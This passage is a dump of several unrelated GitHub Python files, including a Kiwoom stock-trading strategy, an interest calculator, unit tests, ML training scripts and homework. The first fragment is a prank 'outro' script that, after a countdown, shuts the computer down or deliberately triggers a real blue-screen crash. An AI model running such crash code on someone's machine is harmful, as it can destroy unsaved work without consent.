PlaySound(f'{getcwd()}/outro-revamped/outro.wav', SND_ASYNC)\n \n#------\nif __name__ == '__main__':\n getfile()\n print('Please choose an option.\\n[1] Shutdown\\n[2] BSOD\\n[3] Fake BSOD')\n c = int(input())\n play()\n for i in range(10):\n system('cls')\n print(('BSOD 'if c ==2 else ('Shutting down 'if c ==1 else'FBSOD ')) +'in '+str(10-i) +' seconds...')\n sleep(1)\n if c == 1:\n sd()\n elif c == 2:\n sleep(0.5)\n bsod()\n else:\n fbsod()\n","repo_name":"Staniu1337/computer-outro-revamp","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"68"} +{"seq_id":"37027381084","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\nn = int(input())\r\narr = []\r\nfor _ in range(n):\r\n arr.append(int(input()))\r\narr = sorted(arr, reverse=True)\r\n\r\nanswer = 0\r\nfor i, x in enumerate(arr, start=1):\r\n tmp = x*i\r\n answer = max(answer, tmp)\r\n\r\nprint(answer)","repo_name":"muyaaho/algorithm","sub_path":"백준/Silver/2217. 로프/로프.py","file_name":"로프.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"9024494409","text":"import time\r\n\r\nfrom api.Kiwoom import *\r\nfrom util.db_helper import *\r\nfrom util.time_helper import *\r\nfrom util.notifier import *\r\nimport math\r\nimport traceback\r\n\r\n\r\nclass Strategy(QThread):\r\n def __init__(self, strategy_name, get_universe, check_buy_signal, check_sell_signal):\r\n QThread.__init__(self)\r\n self.strategy_name = strategy_name\r\n self.kiwoom = Kiwoom()\r\n\r\n self.universe = {}\r\n\r\n self.round_deposit = 0\r\n self.deposit = 0\r\n\r\n self.order_wait = 60 # 체결대기시간 1분\r\n\r\n self.get_universe = get_universe\r\n self.check_buy_signal = check_buy_signal\r\n self.check_sell_signal = check_sell_signal\r\n\r\n self.is_init_success = False\r\n\r\n self.init_strategy()\r\n\r\n def init_strategy(self):\r\n try:\r\n # 유니버스 조회, 없으면 생성\r\n self.check_and_get_universe()\r\n\r\n # 가격 정보를 조회, 필요하면 생성\r\n self.check_and_get_price_data()\r\n\r\n # Kiwoom > 주문정보 확인\r\n self.kiwoom.get_order()\r\n\r\n # Kiwoom > 잔고 확인\r\n self.kiwoom.get_balance()\r\n\r\n # Kiwoom > 예수금 확인\r\n self.deposit = self.kiwoom.get_deposit()\r\n\r\n # 유니버스 실시간 체결정보 등록\r\n self.set_universe_real_time()\r\n\r\n self.is_init_success = True\r\n\r\n except Exception as e:\r\n print(traceback.format_exc())\r\n # LINE 메시지를 보내는 부분\r\n send_message(traceback.format_exc(), RSI_STRATEGY_MESSAGE_TOKEN)\r\n\r\n def run(self):\r\n \"\"\"실질적 수행 역할을 하는 함수\"\"\"\r\n while self.is_init_success:\r\n try:\r\n # 장중인지 확인\r\n if not check_transaction_open():\r\n print(\"장시간이 아니므로 5분간 대기합니다.\")\r\n time.sleep(5 * 60)\r\n continue\r\n\r\n for idx, code in enumerate(self.universe.keys()): # for each code in the universe\r\n print(self.deposit)\r\n\r\n print('[{}/{}_{}]'.format(idx + 1, len(self.universe), self.universe[code]['code_name']))\r\n time.sleep(0.5)\r\n\r\n if idx == 0:\r\n self.round_deposit = self.deposit\r\n\r\n # 접수한 주문이 있는지 확인\r\n if code in self.kiwoom.order.keys():\r\n # 미체결시간 초과시 주문 취소\r\n print(self.kiwoom.order[code]['주문시간'])\r\n if self.kiwoom.order[code]['미체결수량'] > 0 and (\r\n datetime.now() - self.kiwoom.order[code]['datetime']).total_seconds() > self.order_wait:\r\n if self.kiwoom.order[code]['주문구분'] == '매수':\r\n self.cancel_buy_order(code)\r\n elif self.kiwoom.order[code]['주문구분'] == '매도':\r\n self.cancel_sell_order(code)\r\n else: # 접수한 주문이 없을 시\r\n if code in self.kiwoom.universe_realtime_transaction_info.keys():\r\n # 보유 종목인지 확인\r\n if code in self.kiwoom.balance.keys():\r\n # 매도\r\n self.check_sell_signal_and_order(code)\r\n # 매수\r\n self.check_buy_signal_and_order(code)\r\n\r\n except Exception as e:\r\n print(traceback.format_exc())\r\n # LINE 메시지를 보내는 부분\r\n send_message(traceback.format_exc(), RSI_STRATEGY_MESSAGE_TOKEN)\r\n\r\n def check_and_get_universe(self): # 유니버스 주기적으로 업데이트 하게 하는 코드 필요\r\n \"\"\"유니버스가 존재하는지 확인하고 없으면 생성하는 함수\"\"\"\r\n if (not check_table_exist(self.strategy_name, 'universe')) or datetime.today().day == 1:\r\n universe_list = self.get_universe()\r\n print(universe_list)\r\n universe = {}\r\n # 오늘 날짜를 20210101 형태로 지정\r\n now = datetime.now().strftime(\"%Y%m%d\")\r\n\r\n # KOSPI(0)에 상장된 모든 종목 코드를 가져와 kospi_code_list에 저장\r\n kospi_code_list = self.kiwoom.get_code_list_by_market(\"0\")\r\n\r\n # KOSDAQ(10)에 상장된 모든 종목 코드를 가져와 kosdaq_code_list에 저장\r\n kosdaq_code_list = self.kiwoom.get_code_list_by_market(\"10\")\r\n\r\n for code in kospi_code_list + kosdaq_code_list:\r\n # 모든 종목 코드를 바탕으로 반복문 수행\r\n code_name = self.kiwoom.get_master_code_name(code)\r\n\r\n # 얻어온 종목명이 유니버스에 포함되어 있다면 딕셔너리에 추가\r\n if code_name in universe_list:\r\n universe[code] = code_name\r\n\r\n # 코드, 종목명, 생성일자자를 열로 가지는 DataFrame 생성\r\n universe_df = pd.DataFrame({\r\n 'code': universe.keys(),\r\n 'code_name': universe.values(),\r\n 'created_at': [now] * len(universe.keys())\r\n })\r\n\r\n # universe라는 테이블명으로 Dataframe을 DB에 저장함\r\n insert_df_to_db(self.strategy_name, 'universe', universe_df)\r\n\r\n sql = \"select * from universe\"\r\n cur = execute_sql(self.strategy_name, sql)\r\n universe_list = cur.fetchall()\r\n for item in universe_list:\r\n idx, code, code_name, created_at = item\r\n self.universe[code] = {\r\n 'code_name': code_name\r\n }\r\n print(self.universe)\r\n\r\n def check_and_get_price_data(self):\r\n \"\"\"일봉 데이터가 존재하는지 확인하고 없다면 생성하는 함수\"\"\"\r\n for idx, code in enumerate(self.universe.keys()):\r\n print(\"({}/{}) {}\".format(idx + 1, len(self.universe), code))\r\n\r\n if check_table_exist(self.strategy_name, code):\r\n if check_transaction_closed():\r\n print(\"장 종료 시간입니다. 데이터베이스 업데이트를 시작합니다.\")\r\n # 저장된 데이터의 가장 최근 일자를 조회\r\n sql = \"select max(`{}`) from `{}`\".format('index', code)\r\n\r\n cur = execute_sql(self.strategy_name, sql)\r\n\r\n # 일봉 데이터를 저장한 가장 최근 일자를 조회\r\n last_date = cur.fetchone()\r\n\r\n # 오늘 날짜를 20210101 형태로 지정\r\n now = datetime.now().strftime(\"%Y%m%d\")\r\n\r\n # 최근 저장 일자가 오늘이 아닌지 확인\r\n if last_date[0] != now:\r\n price_df = self.kiwoom.get_price_data(code)\r\n time.sleep(0.5)\r\n # 코드를 테이블 이름으로 해서 데이터베이스에 저장\r\n insert_df_to_db(self.strategy_name, code, price_df)\r\n self.universe[code]['price_df'] = price_df\r\n else:\r\n print(\"데이터베이스에서 일봉데이터를 불러옵니다.\")\r\n sql = \"select * from `{}`\".format(code)\r\n cur = execute_sql(self.strategy_name, sql)\r\n cols = [column[0] for column in cur.description]\r\n\r\n # 데이터베이스에서 조회한 데이터를 DataFrame으로 변환해서 저장\r\n price_df = pd.DataFrame.from_records(data=cur.fetchall(), columns=cols)\r\n price_df = price_df.set_index('index')\r\n # 가격 데이터를 self.universe에서 접근할 수 있도록 저장\r\n self.universe[code]['price_df'] = price_df\r\n else:\r\n if check_transaction_closed():\r\n print(\"장 종료 시간입니다. 금일 데이터 포함 일봉 정보를 다운로드합니다.\")\r\n # API를 이용해 조회한 가격 데이터 price_df에 저장\r\n price_df = self.kiwoom.get_price_data(code)\r\n # 코드를 테이블 이름으로 해서 데이터베이스에 저장\r\n insert_df_to_db(self.strategy_name, code, price_df)\r\n time.sleep(0.5)\r\n else:\r\n print(\"장 종료 시간 전입니다. 금일 데이터만 제외한 일봉 정보를 다운로드합니다.\")\r\n # API를 이용해 조회한 가격 데이터 price_df에 저장\r\n price_df = self.kiwoom.get_price_data(code)\r\n # 금일 데이터 제외\r\n now = datetime.now().strftime(\"%Y%m%d\")\r\n if now in price_df.index:\r\n price_df.drop(now)\r\n\r\n # 코드를 테이블 이름으로 해서 데이터베이스에 저장\r\n insert_df_to_db(self.strategy_name, code, price_df)\r\n time.sleep(0.5)\r\n\r\n def cancel_buy_order(self, code):\r\n print('미체결 시간이 초과되어 주문이 취소됩니다')\r\n\r\n quantity = self.kiwoom.order[code]['주문수량']\r\n bid = self.kiwoom.order[code]['주문가격']\r\n origin_order_number = self.kiwoom.order[code]['원주문번호']\r\n\r\n order_result = self.kiwoom.send_order('cancel_buy_order', '1011', 3, code, quantity, 0, '00', origin_order_number)\r\n\r\n # LINE 메시지를 보내는 부분\r\n message = \"[{}]buy order cancelled. quantity:{}, bid:{}, order_result:{}, deposit:{}, get_balance_count:{}, get_buy_order_count:{}, balance_len:{}\".format(\r\n code, quantity, bid, order_result, self.deposit, self.get_balance_count(), self.get_buy_order_count(),\r\n len(self.kiwoom.balance))\r\n send_message(message, RSI_STRATEGY_MESSAGE_TOKEN)\r\n\r\n def cancel_sell_order(self, code):\r\n print('미체결 시간이 초과되어 주문이 취소됩니다')\r\n\r\n quantity = self.kiwoom.order[code]['주문수량']\r\n ask = self.kiwoom.order[code]['주문가격']\r\n origin_order_number = self.kiwoom.order[code]['원주문번호']\r\n\r\n order_result = self.kiwoom.send_order('cancel_sell_order', '1011', 4, code, quantity, 0, '00', origin_order_number)\r\n\r\n # LINE 메시지를 보내는 부분\r\n message = \"[{}]sell order is cancelled. quantity:{}, ask:{}, order_result:{}\".format(code, quantity, ask,\r\n order_result)\r\n send_message(message, RSI_STRATEGY_MESSAGE_TOKEN)\r\n\r\n def order_buy(self, code, quantity):\r\n if quantity < 1:\r\n return\r\n\r\n bid = self.kiwoom.universe_realtime_transaction_info[code]['(최우선)매수호가']\r\n\r\n # 현재 예수금에서 수수료를 곱한 실제 투입금액(주문 수량 * 주문 가격)을 제외해서 계산\r\n amount = quantity * bid\r\n new_deposit = math.floor(self.deposit - amount * 1.00015)\r\n\r\n # 예수금이 0보다 작아질 정도로 주문할 수는 없으므로 체크\r\n if new_deposit < 0:\r\n return\r\n else:\r\n self.deposit = new_deposit\r\n\r\n # 계산을 바탕으로 지정가 매수 주문 접수\r\n order_result = self.kiwoom.send_order('send_buy_order', '1001', 1, code, quantity, bid, '00')\r\n\r\n # _on_chejan_slot가 늦게 동작할 수도 있기 때문에 미리 약간의 정보를 넣어둠\r\n self.kiwoom.order[code] = {'주문구분': '매수', '미체결수량': quantity}\r\n\r\n # LINE 메시지를 보내는 부분\r\n message = \"[{}]buy order is done! quantity:{}, bid:{}, order_result:{}, deposit:{}, get_balance_count:{}, get_buy_order_count:{}, balance_len:{}\".format(\r\n code, quantity, bid, order_result, self.deposit, self.get_balance_count(), self.get_buy_order_count(),\r\n len(self.kiwoom.balance))\r\n send_message(message, RSI_STRATEGY_MESSAGE_TOKEN)\r\n\r\n def order_sell(self, code, quantity):\r\n if quantity < 1:\r\n return\r\n\r\n # 보유수량보다 많이 팔수는 없음\r\n if self.kiwoom.balance[code]['보유수량'] < quantity:\r\n return self.kiwoom.balance[code]['보유수량']\r\n\r\n # 최우선 매도 호가 확인\r\n ask = self.kiwoom.universe_realtime_transaction_info[code]['(최우선)매도호가']\r\n\r\n order_result = self.kiwoom.send_order('send_sell_order', '1001', 2, code, quantity, ask, '00')\r\n\r\n # LINE 메시지를 보내는 부분\r\n message = \"[{}]sell order is done! quantity:{}, ask:{}, order_result:{}\".format(code, quantity, ask,\r\n order_result)\r\n send_message(message, RSI_STRATEGY_MESSAGE_TOKEN)\r\n\r\n def check_buy_signal_and_order(self, code):\r\n quantity = self.check_buy_signal(code)\r\n if quantity > 0:\r\n self.order_buy(code, quantity)\r\n\r\n def check_sell_signal_and_order(self, code):\r\n quantity = self.check_sell_signal(code)\r\n if quantity > 0:\r\n self.order_sell(code, quantity)\r\n\r\n def set_universe_real_time(self):\r\n \"\"\"유니버스 실시간 체결정보 수신 등록하는 함수\"\"\"\r\n # 임의의 fid를 하나 전달하기 위한 코드(아무 값의 fid라도 하나 이상 전달해야 정보를 얻어올 수 있음)\r\n fids = get_fid(\"체결시간\")\r\n\r\n # 장운영구분을 확인하고 싶으면 사용할 코드\r\n # self.kiwoom.set_real_reg(\"1000\", \"\", get_fid(\"장운영구분\"), \"0\")\r\n\r\n # universe 딕셔너리의 key값들은 종목코드들을 의미\r\n codes = self.universe.keys()\r\n\r\n # 종목코드들을 ';'을 기준으로 묶어주는 작업\r\n codes = \";\".join(map(str, codes))\r\n\r\n # 화면번호 9999에 종목코드들의 실시간 체결정보 수신을 요청\r\n self.kiwoom.set_real_reg(\"9999\", codes, fids, \"0\")\r\n\r\n def get_balance_count(self):\r\n \"\"\"매도 주문이 접수되지 않은 보유 종목 수를 계산하는 함수\"\"\"\r\n balance_count = len(self.kiwoom.balance)\r\n # kiwoom balance에 존재하는 종목이 매도 주문 접수되었다면 보유 종목에서 제외시킴\r\n for code in self.kiwoom.order.keys():\r\n if code in self.kiwoom.balance and self.kiwoom.order[code]['주문구분'] == \"매도\" and self.kiwoom.order[code][\r\n '미체결수량'] == 0:\r\n balance_count = balance_count - 1\r\n return balance_count\r\n\r\n def get_buy_order_count(self):\r\n \"\"\"매수 주문 종목 수를 계산하는 함수\"\"\"\r\n buy_order_count = 0\r\n # 아직 체결이 완료되지 ���은 매수 주문\r\n for code in self.kiwoom.order.keys():\r\n if code not in self.kiwoom.balance and self.kiwoom.order[code]['주문구분'] == \"매수\":\r\n buy_order_count = buy_order_count + 1\r\n return buy_order_count\r\n","repo_name":"joshorjoshua/QuantTrading","sub_path":"strategy/Strategy.py","file_name":"Strategy.py","file_ext":"py","file_size_in_byte":15440,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"17893031794","text":"\"\"\"\nauthor : sayantan (sayantan.ghosh@strandls.com)\nWorking on a dynamic financial manager web development project using Flask\n\"\"\"\n\nimport json, os, sys, enum\nfrom datetime import datetime\nfrom pprint import pprint\n\njson_file = '../data/financial-details.json'\nprop_file = '../data/user-details.prop'\nmessages = '../data/messages.json'\ncurrent_datetime = datetime.now()\n\ndef check_file_exists(filename):\n\tif not os.path.exists(filename):\n\t\traise Exception(messages['error-messages']['FILE_NOT_PRESENT'].format(filename))\n\ndef read_json(json_file):\n\tcheck_file_exists(json_file)\n\treturn json.load(open(json_file, 'r'))\n\ndef read_properties(prop_file):\n\tcheck_file_exists(prop_file)\n\tprop_dict = dict()\n\tfor line in open(prop_file, 'r').readlines():\n\t\tkey, value = line.split('=')\n\t\tprop_dict[key] = value.strip()\n\treturn prop_dict\n\ndef get_datetime_object(dateTimeStr):\n\treturn datetime.strptime(dateTimeStr, '%d-%m-%Y %H:%M:%S.%f')\n\ndef get_investment_tenure(startDateObj, endDateObj):\n\tif current_datetime > endDateObj:\n\t\ttime_diff = endDateObj - startDateObj\n\telif current_datetime < endDateObj:\n\t\ttime_diff = current_datetime - startDateObj\n\treturn time_diff.days / 365\n\nclass InvestmentType(enum.Enum):\n\tfixedDeposit = 'Fixed Deposit'\n\trecurringDeposit = 'Recurring Deposit'\n\tppf = 'Public Provident Fund'\n\nclass Investment():\n\tdef __init__(self, principal, rate, time, startDate, endDate):\n\t\tself.principal = principal\n\t\tself.rate = rate\n\t\tself.time = time\n\t\tself.startDate = startDate\n\t\tself.endDate = endDate\n\n\tdef toString(self):\n\t\tprint('PRINCIPAL : {}, RATE : {}, TIME : {}, START DATE : {}, END DATE : {}'.format(self.principal, self.rate, \\\n\t\t\tself.time, self.startDate, self.endDate))\n\nclass FixedDeposit(Investment):\n\tdef __init__(self, principal, rate, time, startDate, endDate):\n\t\tsuper().__init__(principal, rate, time, startDate, endDate)\n\t\tself.type = InvestmentType.fixedDeposit.value\n\n\tdef calculateAmount(self):\n\t\tstartDateObj, endDateObj = [get_datetime_object(self.startDate), get_datetime_object(self.endDate)]\n\t\ttime_diff_years = get_investment_tenure(startDateObj, endDateObj)\n\t\t# Interest is compounded quaterly for a fixed deposit\n\t\tamount = self.principal * (1 + (self.rate / 4) / 100) ** (4 * time_diff_years)\n\t\treturn amount\n\nclass RecurringDeposit(Investment):\n\tdef __init__(self, principal, rate, time, startDate, endDate):\n\t\tsuper().__init__(principal, rate, time, startDate, endDate)\n\t\tself.type = InvestmentType.recurringDeposit.value\n\n\tdef calculateAmount(self):\n\t\tstartDateObj, endDateObj = [get_datetime_object(self.startDate), get_datetime_object(self.endDate)]\n\t\ttime_diff_years = int(get_investment_tenure(startDateObj, endDateObj))\n\t\t# Interest is compounded quaterly (amount is the sum of the series)\n\t\ttenure = round(time_diff_years) * 12\n\t\tmaturity_amount = 0\n\t\tfor month in range(tenure,0,-1):\n\t\t\tamount = self.principal * (1 + (self.rate / 4) / 100) ** (4 * (month/12))\n\t\t\tmaturity_amount += amount\n\t\treturn maturity_amount\n\nclass PublicProvidentFund(Investment):\n\tdef __init__(self, principal, rate, time, startDate, endDate):\n\t\tsuper().__init__(principal, rate, time, startDate, endDate)\n\t\tself.type = InvestmentType.ppf.value\n\n\tdef calculateAmount(self):\n\t\tpass\n\ndef print_user_details(user_details):\n\tfor key in user_details.keys():\n\t\tprint('{} : {}'.format(key.upper(), user_details[key]))\n\ndef create_investment_objects(investment_dict, investment_type):\n\tinvestment_objects = list()\n\tfor investment in investment_dict[investment_type]:\n\t\tif investment_type == InvestmentType.fixedDeposit.value:\n\t\t\tdeposit = FixedDeposit(investment['Principal'], investment['Rate'], investment['Time'], \n\t\t\t\tinvestment['Start Date'], investment['End Date'])\n\t\telif investment_type == InvestmentType.recurringDeposit.value:\n\t\t\tdeposit = RecurringDeposit(investment['Principal'], investment['Rate'], investment['Time'],\n\t\t\t\tinvestment['Start Date'], investment['End Date'])\n\t\telse:\n\t\t\traise Exception('Unknown Investment Type : {} provided'.format(investment_type))\n\t\tinvestment_objects.append(deposit)\n\treturn investment_objects\n\ndef process_finance():\n\tuser_details = read_properties(prop_file)\n\tprint_user_details(user_details)\n\tfinancial_details = read_json(json_file)\n\tfd_objects = create_investment_objects(financial_details, InvestmentType.fixedDeposit.value)\n\trd_objects = create_investment_objects(financial_details, InvestmentType.recurringDeposit.value)\n\tfor fd_object in fd_objects:\n\t\tprint(fd_object.calculateAmount())\n\tfor rd_object in rd_objects:\n\t\tprint(rd_object.calculateAmount())\n\nif __name__ == '__main__':\n\tprocess_finance()\n","repo_name":"sayantansls/financial-manager","sub_path":"src/finances.py","file_name":"finances.py","file_ext":"py","file_size_in_byte":4583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"74326367576","text":"from mock import Mock, MagicMock\nfrom nose.tools import ok_\n\nfrom pylease.ctxmgmt import Caution, ReplacedSetup\nfrom tests import PyleaseTest, MockedSetupPy\n\n\nclass ContextManagersTest(PyleaseTest):\n def test_replaced_setup_must_replace_the_setuptools_setup_with_provided_callback(self):\n key1 = 'key1'\n val1 = 'val1'\n key2 = 'key2'\n val2 = 'val2'\n\n kwargs = {key1: val1, key2: val2}\n setup_py = \"\"\"\n from setuptools import setup\n\n kwargs = {{'{}': '{key1}', '{}': '{key2}'}}\n setup(**kwargs)\n \"\"\". format(key1, key2, **kwargs)\n\n callback = Mock()\n\n with ReplacedSetup(callback):\n with MockedSetupPy(setup_py, self):\n __import__('setup')\n\n callback.assert_called_once_with(**kwargs)\n\n def test_caution_context_manager_must_rollback_everything_if_error_occurs(self):\n rb1 = MagicMock()\n rb2 = MagicMock()\n rb3 = MagicMock()\n\n with Caution() as caution:\n caution.add_rollback(rb1)\n caution.add_rollback(rb2)\n\n raise Exception()\n\n rb1.assert_called_once_with()\n rb2.assert_called_once_with()\n ok_(not rb3.called)\n\n def test_caution_context_manager_should_leave_everythin_as_is_if_no_error_occurs(self):\n rb1 = MagicMock()\n\n with Caution() as caution:\n caution.add_rollback(rb1)\n\n ok_(not rb1.called)\n","repo_name":"bagrat/pylease","sub_path":"tests/test_ctxmgmt.py","file_name":"test_ctxmgmt.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"68"} +{"seq_id":"38017422081","text":"from dataLoaders import *\nfrom catalyst.dl import SupervisedRunner, CallbackOrder, Callback, CheckpointCallback\nfrom config import *\nfrom funcs import get_dict_from_class,count_parameters\nfrom models import FeatureExtractor,modelling_3d\nfrom losses import BCELoss\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\nimport pandas as pd\nfrom catalyst import dl\n#from callbacks import MetricsCallback\nfrom sklearn.model_selection import StratifiedKFold\nimport torch\ndef train(model_param,model_,data_loader_param,data_loader,loss_func,callbacks=None,pretrained=None):\n randSeed=23\n data_load = data_loader(**get_dict_from_class(data_loader_param))\n criterion = loss_func\n model = model_(**get_dict_from_class(model_param))\n count_parameters(model)\n # model = FCLayered(**get_dict_from_class(model_param,model))\n if pretrained is not None:\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n checkpoint = torch.load(pretrained, map_location=device)\n try:\n model.load_state_dict(checkpoint['model_state_dict'])\n except:\n model.load_state_dict(checkpoint)\n model.eval()\n optimizer = optim.SGD(model.parameters(), lr=lr)\n\n\n train = data_load.data\n train[\"fold\"] = -1\n temp=train['patient_id'].unique()\n temp_dict={}\n for t in temp:\n temp_dict[t]=random.randint(0,10)\n train['fold']=train['patient_id'].apply(lambda x:temp_dict[x])\n\n\n\n\n # # check the proportion\n #fold_proportion = pd.pivot_table(train, columns=\"fold\", values=\"label\", aggfunc=len)\n\n use_fold = 0\n\n train_file = train.query(\"fold != @use_fold\")\n val_file = train.query(\"fold == @use_fold\")\n\n print(\"[fold {}] train: {}, val: {}\".format(use_fold, len(train_file['patient_id']), len(val_file['patient_id'])))\n\n loaders = {\n \"train\": DataLoader(data_loader( data_frame=train_file,**get_dict_from_class(data_loader_param)),\n batch_size=2,\n shuffle=False,\n num_workers=1,\n pin_memory=True,\n drop_last=False),\n \"valid\": DataLoader(data_loader(data_frame=val_file, **get_dict_from_class(data_loader_param)),\n batch_size=2,\n shuffle=False,\n num_workers=1,\n pin_memory=True,\n drop_last=False)\n }\n\n callbacks = callbacks\n runner = SupervisedRunner(\n\n output_key=\"logits\",\n input_key=\"image_pixels\",\n target_key=\"targets\")\n # scheduler=scheduler,\n\n runner.train(\n model=model,\n criterion=criterion,\n loaders=loaders,\n optimizer=optimizer,\n\n num_epochs=epoch,\n verbose=True,\n logdir=f\"fold0\",\n callbacks=callbacks,\n )\n\n # main_metric = \"epoch_f1\",\n # minimize_metric = False\n\nif __name__ == \"__main__\":\n from callbacks import *\n\n callbacks = [MetricsCallback(input_key=\"targets\", output_key=\"logits\",\n directory=saveDirectory, model_name='rsna'),dl.AUCCallback(\n input_key=\"logits\", target_key=\"targets\")]\n train(model_param,model,data_loader_param,data_loader,loss_func,callbacks,pretrained=pre_trained_model)","repo_name":"vivektewari/rsna_cnn_classification","sub_path":"codes/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"33478060527","text":"import unittest\nfrom Classes.Ticket import Ticket\nfrom Enums.Sections import Section\nfrom Classes.TicketDecorator import decorate_ticket\n\n\nclass TestTicketDecorator(unittest.TestCase):\n def test_decorate_ticket(self):\n ticket = Ticket(Section.PHARMACY, 1)\n test_value = decorate_ticket(ticket)\n desired_value = f\"\"\"---------------------------------------\n| Welcome to Nice Shops INC. \n| Your turn is:\n| \n| \\t\\tPH1\n|\n| Go to pharmacy and wait your turn.\n|\n| Respect the 1.5m space between\n| other clients and remember\n| that smoking is forbidden.\n|\n| Thank you and have a nice day.\n---------------------------------------\"\"\"\n self.assertEqual(test_value, desired_value)\n\n","repo_name":"sszahinos/Python-Total-Course","sub_path":"Day 8 - Shop Turn Manager/test/TestTicketDecorator.py","file_name":"TestTicketDecorator.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"30956720898","text":"#1 point\n#create a function exampleOne with four input parameters.\n#return a new dictionary where 1st and 3rd parameter will be keys,\n#and 2nd and 4th will be values, so your key-value pair will be 1st-2nd, 3-4th\ndef exampleOne(paramOne, paramTwo, paramThree, paramFour):\n return {paramOne: paramTwo, paramThree: paramFour}\nprint(exampleOne('key1', 'val1', 'key2', 'val2'))\n\n#2 points\n#create a function exampleTwo with one parameter which will be an array of arrays, where inner arrays have 2 elements\n#iterate over each element in the array and extract first element as a key, second as a value\n#construct a dictionary out of them\n#e.g input( [ [\"key1\",\"value1\"], [\"key2\",\"value2\"] ] -> output dictionary of matching pairs \"key1\"-\"value2\", \"key2\"-\"value2\"\ndef exampleTwo(paramOne):\n return {kv[0]: kv[1] for kv in paramOne}\nprint(exampleTwo([[\"key1\", \"value1\"], [\"key2\", \"value2\"]]))\n\n\n#2 points\n#create a function exampleThree with two input paratmers, first one is a random dictionary, second is a random key\n#return the square of retrieved element, if input key(second param) is present in input dictionary(first param)\n#if not present, return 0\n#create a function exampleThree with two input paratmers, first one is a random dictionary, second is a random key\n#return the square of retrieved element, if input key(second param) is present in input dictionary(first param)\n#if not present, return 0\ndef exampleThree(paramOne, paramTwo):\n if paramTwo not in paramOne:\n return 0\n return paramOne[paramTwo] * paramOne[paramTwo]\nrandom_dictionary = {25: 1, 50: 10}\nrandom_key = 50\nprint(exampleThree(random_dictionary, random_key))\n\n#5 points\n#create function exampleFour with two input parameters, first one is an array of letters, second is words\n#return the new dictionary where letters are matched with words based on the first letter, i.e. abbreviation\n#you can assume that all of the letters and words will be a unique match, i.e. if 5 letters, then there are 5 words\n#e.g. inputs [\"D\",\"M\",\"V\"], [\"Motor\",\"Division\",\"Vehicles\"] -> out dictionary of \"D\"-\"Division\",\"M\"-\"Motor\",\"Vehicles\"\ndef exampleFour(paramOne, paramTwo):\n result = {}\n for key in paramOne:\n for value in paramTwo:\n if value.startswith(key):\n result[key] = value\n break\n return result\nprint(exampleFour([\"D\",\"M\",\"V\"], [\"Motor\",\"Division\",\"Vehicles\"]))\n","repo_name":"clairemorawski/python","sub_path":"Homework5/HW_Dict_To_Fill.py","file_name":"HW_Dict_To_Fill.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"72510511898","text":"import time\nimport pickle\nimport tensorflow as tf\nfrom Models.SOPOptimizer import setup_sop_optimizer\nfrom Models.SOPOptimizer import evaluate_loss_on_batch\nfrom Utils.load_data import load_mnist_sop_data\n\ntic = time.time()\ndataset_name = 'sop'\npath_to_trained_models = './Results/trained_models/' + dataset_name + '/'\nmodels = {\n 1: {'model_dir': 'igr', 'model_type': 'IGR_I'},\n 2: {'model_dir': 'gs', 'model_type': 'GS'},\n 3: {'model_dir': 'pf', 'model_type': 'IGR_Planar'},\n 4: {'model_dir': 'sb', 'model_type': 'IGR_SB_Finite'},\n}\nselect_case = 2\nrun_with_sample = False\n# samples_n = 1 * int(1.e3)\nsamples_n = 1 * int(1.e3)\n\nhyper_file, weights_file = 'hyper.pkl', 'w.h5'\nmodel_type = models[select_case]['model_type']\npath_to_trained_models += models[select_case]['model_dir'] + '/'\n\nwith open(file=path_to_trained_models + hyper_file, mode='rb') as f:\n hyper = pickle.load(f)\n\nbatch_n = hyper['batch_size']\nhyper['test_sample_size'] = samples_n\ntf.random.set_seed(seed=hyper['seed'])\ndata = load_mnist_sop_data(batch_n=hyper['batch_size'], run_with_sample=run_with_sample)\ntrain_dataset, test_dataset = data\nepoch = hyper['epochs']\nsop_optimizer = setup_sop_optimizer(hyper=hyper)\nfor x in train_dataset:\n x_upper = x[:, :14, :, :]\n break\nsop_optimizer.batch_n = batch_n\naux = sop_optimizer.model.call(x_upper)\nsop_optimizer.model.load_weights(filepath=path_to_trained_models + weights_file)\n\ntest_loss_mean = tf.keras.metrics.Mean()\nfor x in test_dataset:\n loss = evaluate_loss_on_batch(x, sop_optimizer, hyper)\n test_loss_mean(loss)\n\nevaluation_print = f'Epoch {epoch:4d} || '\nevaluation_print += f'TeNLL {-test_loss_mean.result():2.5e} || '\n# evaluation_print += f'Train Loss {train_loss_mean.result():2.5e} || '\nevaluation_print += f'{model_type} || '\ntoc = time.time()\nevaluation_print += f'Time: {toc - tic:2.2e} sec'\nprint(evaluation_print)\n","repo_name":"cunningham-lab/igr","sub_path":"structure_output_prediction/test_trained.py","file_name":"test_trained.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"68"} +{"seq_id":"12492851286","text":"#\r\n# WordRepImport.py\r\n#\r\n# Methods for loading in word representation data (GLoVe)\r\n#\r\n\r\n\r\nimport csv\r\nimport time\r\nimport numpy as np\r\n\r\nfrom Utils import *\r\n\r\n\r\nclass WordRepLibrary():\r\n\r\n # Import the word representation library (GLoVe)\r\n def __init__(self, path):\r\n print(\"Loading word representation library '\"+path.split('/')[-1]+\"'\")\r\n start_time = time.time()\r\n self.library = pd.read_table(path, sep=' ', keep_default_na=False,\r\n index_col=0, quoting=csv.QUOTE_NONE, encoding=\"utf8\", header=None)\r\n t = (time.time() - start_time)\r\n print(\"Loading word representation library 